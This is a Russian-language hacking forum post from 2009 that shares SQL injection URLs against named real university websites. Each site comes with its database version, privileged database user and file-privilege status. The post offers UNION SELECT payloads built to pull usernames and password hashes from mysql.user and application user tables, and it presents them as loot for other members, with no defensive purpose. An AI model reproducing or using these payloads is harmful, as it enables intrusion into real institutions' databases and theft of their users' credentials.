Показать сообщение отдельно

  #10  
Старый 23.07.2009, 21:13
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
С нами: 9561436

Репутация: 462
По умолчанию

Порция сладенького

wallace.edu
PR 6

5.0.45-community-nt-log:web_mysql@localhost

Код:
http://www.wallace.edu/student_resources/pathways/news_full_article.htm?id=-14+union+select+1,concat(version(),0x3a,user()),3,4,5,6--
MySql:

Код:
http://www.wallace.edu/student_resources/pathways/news_full_article.htm?id=-14+union+select+1,concat(user,0x3a,password),3,4,5,6+from+mysql.user--

fasn.rutgers.edu
PR 6

root@ru-6j16advh2j9z:5.0.45-community-nt


Код:
http://fasn.rutgers.edu/announcements.php?id=-14+union+Select+1,2,concat(user(),0x3a,version()),4,5--
File_priv = Y

MySql:

Код:
http://fasn.rutgers.edu/announcements.php?id=-14+union+Select+1,2,concat(user,0x3a,password),4,5+from+mysql.user--

hedgecock.bio.jhu.edu
PR 5

4.0.15-standard:webserver@localhost


Код:
http://hedgecock.bio.jhu.edu/information/article.php?id=-14+union+select+1,2,concat(version(),0x3a,user()),4,5,6--
Код:
http://hedgecock.bio.jhu.edu/information/article.php?id=-14+union+select+1,2,concat(name,0x3a,pass),4,5,6+from+users--
library.ccuniversity.edu
PR 5

5.0.37-community-nt:root@localhost

Код:
http://library.ccuniversity.edu/index.php?ID=14+and+1=0+Union+Select+1,concat(version(),0x3a,user()),3--
File_priv = Y
 
Ответить с цитированием